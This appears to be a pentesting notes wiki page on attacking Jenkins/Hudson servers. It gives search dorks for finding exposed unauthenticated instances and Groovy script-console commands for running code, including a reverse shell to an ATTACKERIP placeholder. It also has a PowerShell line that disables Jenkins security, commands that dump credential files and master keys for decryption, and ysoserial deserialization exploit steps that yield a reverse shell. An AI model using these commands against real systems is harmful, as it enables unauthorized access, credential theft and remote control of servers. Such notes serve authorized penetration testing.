WebApp

From BHaFSec Pentesting Notes Wiki
Jump to: navigation, search

Jenkins / Hudson

Google Dorks:
Public instances: intitle:"Dashboard [Jenkins]"
Public instances with no authentication: intitle:"Dashboard [Jenkins]" intext:"Manage Jenkins"


Linux Based
http://<Target-jenkins-url>/jenkins/script

println "ls".execute().text

println "uname -a".execute().text
println "ls".execute().text
def process = "ls".execute()
process.text.eachLine {println it}
def process = "bash -i >& /dev/tcp/ATTACKERIP/443 0>&1".execute()
process.text.eachLine {println it}


Windows Based
Remove Security
Running it as a build step on master and a service restart will result in removal of all security from the web console and anyone browsing to the URL will have admin rights

powershell "(cat C:\test\config.xml) -replace('<usesecurity>true</useSecurity>','<usesecurity>false</useSecurity>') | Set-Content C:\test\config.xml

Decrypt Credentials (the key and Secret are binary and outputted to preserve their format.

powershell -c "cat 'C:\Program Files (x86)\Jenkins\credentials.xml'"
powershell -c "cat -encoding byte 'C:\Program Files (x86)\Jenkins\secrets\master.key'"
powershell -c "cat -encoding byte -path 'C:\Program Files (x86)\Jenkins\secrets\hudson.util.Secret'"

Then use this powershell script to convert the test back to binary

PS C:\nishang> . C:\nishang\Utility\TexttoExe.ps1
PS C:\nishang> TexttoEXE -FileName C:\test\hudson.util.txt -EXE C:\test\hudson.util.secret
PS C:\nishang> TexttoEXE -FileName C:\test\master.txt -EXE C:\test\master.key


Unserialization
download ysoserial Create a reverse shell using ysoserial:

java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'powershell.exe -e <encoded_reverse_shell>' > payload.out

download JavaUnserializeExploits

python jenkins_exploit.py <target> <port> payload.out

an easier python script to do this can be found here video is here

Weblogic

JBOSS

WebSphere

OpenNMS